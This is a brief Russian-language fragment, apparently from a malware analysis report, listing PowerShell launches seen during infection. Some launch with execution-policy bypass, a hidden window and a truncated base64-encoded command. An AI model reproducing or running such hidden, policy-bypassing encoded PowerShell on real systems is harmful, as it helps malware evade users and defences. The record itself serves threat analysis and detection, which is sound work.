Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABSAHUAbgBzAHAAYQBjAGUAIAA9ACAAWwByAHUAbgBzAHAAYQBjAGUAZgBhAGMAdABvAHIAeQBdADoAOgBDAHIAZQBhAHQAZQBSAHUAbgBzAHAAYQBjAGUAKAApAAoAJABQA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABSAHUAbgBzAHAAYQBjAGUAIAA9ACAAWwByAHUAbgBzAHAAYQBjAGUAZgBhAGMAdABvAHIAeQBdADoAOgBDAHIAZQBhAHQAZQBSAHUAbgBzAHAAYQBjAGUAKAApAAoAJABQA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile